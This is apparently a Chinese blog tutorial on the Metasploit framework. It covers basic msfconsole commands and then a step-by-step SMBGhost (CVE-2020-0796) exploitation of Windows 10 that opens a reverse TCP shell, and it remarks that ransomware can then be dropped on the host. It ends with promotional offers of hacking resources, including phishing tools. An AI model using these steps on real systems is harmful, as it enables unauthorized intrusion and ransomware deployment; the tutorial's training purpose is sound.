一、Metasploit简介
Metasploit和Cobalt Strike是两款著名的渗透测试框架,作为网络安全从业人员,有必要做些基本了解和功能的使用,未知攻,焉知防,从攻防对抗的角度去深度理解网络安全问题,首先做好网络安全基础防护,再逐步过渡到高阶对抗。
Metasploit主要是用来利用和验证漏洞,包括社区版和专业版本(可以试用30天,企业邮箱申请),由ruby语言开发为主,官方网站(www.metasploit.com)可以下载,支持Linux、MacOS、windows系统,由H.D.Moore在2003年发布。从此,似乎人人都可以成为黑客了,Metasploit团队一直在开发各种攻击工具。2009年底,Rapid7公司收购metasploit团队,H.D.Moore也加入Rapid7,metasploit迈上一个新台阶。本文简单介绍一下这个框架。
专业版和社区版的功能对比,其实社区版的功能偏少,但是开源的,可以自己增加或修改功能。但是功能足以让从业人员了解渗透基本知识。如下图所示:
二、Metasploit使用方法
1.如何进入msf
一般kali liuix自带Metasploit社区版,通过虚拟机(vmware workstation)安装kali linux(官网www.kali.org下载),做渗透测试建议配置不低于32G内存的PC或服务器。kali安装(建议做好快照)之后打开终端命令行,输入msfdb run就进入metasploit框架,基于postgresql数据库。如下图所示:
输入help,可以查看帮助。
2.常用命令介绍
2.1 connect命令
connect 192.168.6.128 5003,连接本地的资产灯塔ARL,提交get请求,可以查看到服务器的版本号。
2.2 show命令
show -h帮助命令
show exploits 查看攻击模块exp。
show payloads 查看攻击载荷。
show auxiliary 查看辅助攻击载荷。
2.3 search命令
search -h 帮助命令。
search xxx 根据关键字查询search oracle,查询所有与oracle相关的,内容很多。
search name:xxx 根据名称查询search name:oracle,查询名字为oracle的。
search path:xxx 根据路径查询search path:oracle,查看路径中包含oracle的。
search platform:xxx 根据平台查询 search platform:oracle,查看影响此平台的模块。
search type:xxx 根据模块类型查找search type:exploit,查看exp模块。包括这些模块(exploit, payload, auxiliary, encoder, evasion, post, or nop),可以通过search -h帮助命令查看。
search name:xxx type:xxx 多参数联合查找search name:oracle type:exploit,查看类型和名称。
三、msf实战永恒之黑
1.search cve: CVE-2020-0796 type:exploit 查询一下永恒之黑的exp。
2.use 1 加载模块
show options 查看配置项,可以查看该漏洞影响的版本,win10 v1903-1909 x64。还可以查看对应的payload。
set lhost 设置本机IP,lport默认即可。
3.search windows/x64/shell type:payload 找一个好用的payload,并设置set payload windows/x64/shell/reverse_tcp
4.show options查看配置信息
通过set rhosts设置被攻击主机IP,设置完成之后,set defangedmode false,输入exploit,成功进入win10主机,可以通过相关服务下载勒索病毒到win10中。
5.win10永恒之黑存在条件
445端口开启,共享开启。系统版本Windows10 v1903-1909 x64,没有打KB4551762补丁。
查看win10版本和补丁方式
“设置-系统-关于”中查看版本号是否满足要求。
查看补丁systeminfo
查看共享功能是否打开
四、总结
学习Metasploit框架对网络安全从业人员,尤其是售前、售后、产品经理和研发人员来说,具有重要意义。通过掌握这一强大的渗透测试工具,这些专业人员可以深入了解各种渗透攻击的原理和方法,从攻击者的视角审视网络安全问题。这种视角有助于更全面地认识自身产品的潜在安全漏洞,并设计出更加安全的系统架构和防护机制。售前人员可以利用Metasploit演示实际攻击场景,增强客户对安全产品的信任;售后人员则能够迅速复现和分析客户遇到的安全问题,提供高效的解决方案;产品经理可以基于实际攻击手段,制定更具针对性的安全策略和功能需求;研发人员通过实战练习,不仅提高了漏洞利用和修复的技能,还能在开发过程中提前预防安全漏洞的产生。总体而言,学习和掌握Metasploit框架,能够使网络安全从业人员更好地理解和应对现实中的网络威胁,从而提升整个团队的安全防护能力和产品质量。
黑客&网络安全如何学习
今天只要你给我的文章点赞,我私藏的网安学习资料一样免费共享给你们,来看看有哪些东西。
1.学习路线图
攻击和防守要学的东西也不少,具体要学的东西我都写在了上面的路线图,如果你能学完它们,你去就业和接私活完全没有问题。
2.视频教程
网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。
内容涵盖了网络安全法学习、网络安全运营等保测评、渗透测试基础、漏洞详解、计算机基础知识等,都是网络安全入门必知必会的学习内容。
(都打包成一块的了,不能一一展开,总共300多集)
因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取
优快云大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享
3.技术文档和电子书
技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。
因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取
优快云大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享
4.工具包、面试题和源码
“工欲善其事必先利其器”我为大家总结出了最受欢迎的几十款款黑客工具。涉及范围主要集中在 信息收集、Android黑客工具、自动化工具、网络钓鱼等,感兴趣的同学不容错过。
还有我视频里讲的案例源码和对应的工具包,需要的话也可以拿走。
因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取
优快云大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享
最后就是我这几年整理的网安方面的面试题,如果你是要找网安方面的工作,它们绝对能帮你大忙。
这些题目都是大家在面试深信服、奇安信、腾讯或者其它大厂面试时经常遇到的,如果大家有好的题目或者好的见解欢迎分享。
参考解析:深信服官网、奇安信官网、Freebuf、csdn等
内容特点:条理清晰,含图像化表示更加易懂。
内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…
因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
